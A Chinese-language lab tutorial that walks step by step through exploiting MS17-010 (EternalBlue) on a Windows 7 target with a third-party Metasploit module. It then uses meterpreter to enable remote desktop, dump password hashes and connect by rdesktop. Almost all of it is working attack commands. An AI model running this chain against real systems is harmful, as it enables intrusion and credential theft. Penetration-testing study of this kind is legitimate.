MS17-010(EternalBlue)
靶机:win7:service Pack1 172.16.5.201
攻击机:kali 172.16.5.158
而且要保证两台机器之间可以ping通
因为kali里面没有这个rb源代码 所以我们要把这个模块导入进去
我们先要smb模块下载到这里面
cd /usr/share/metasploit-framework/modules/exploits/windows/smb
https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-master
将Eternalblue-Doublepulsar-Metasploit文件夹depseternalblue_doublepulsar.rb复制到/smb目录下然后删除EternalblueDoublepulsar-Metasploit文件夹
apt-get update 更新kali
apt-get install wine32 安装wine32
win32(兼容层) 可以在Linux操作系统上运行 Windows 应用的兼容层
msfconsole 开启Msf控制台
use exploit/windows/smb/eternalblue_doublepulsar
show options 看设置选项
set RHOST 172.16.5.201
set PROCESSINJECT explorer.exe
exploit 执行利用
这个时候我们就进入了后渗透模块 如果不知道用什么命令可以 -h
查看目标机的系统信息
meterpreter> sysinfo
meterpreter> run getgui -e
开启靶机远程桌面
meterpreter >run———— windows/gather/smart_hashdump
获取了账号和密码使用 rdesktop 进行远程连接
rdesktop 172.16.5.201
最后可以看到已经连接到靶机了,说明渗透成功,如果对大家有帮助话麻烦大家一键三连谢谢大家!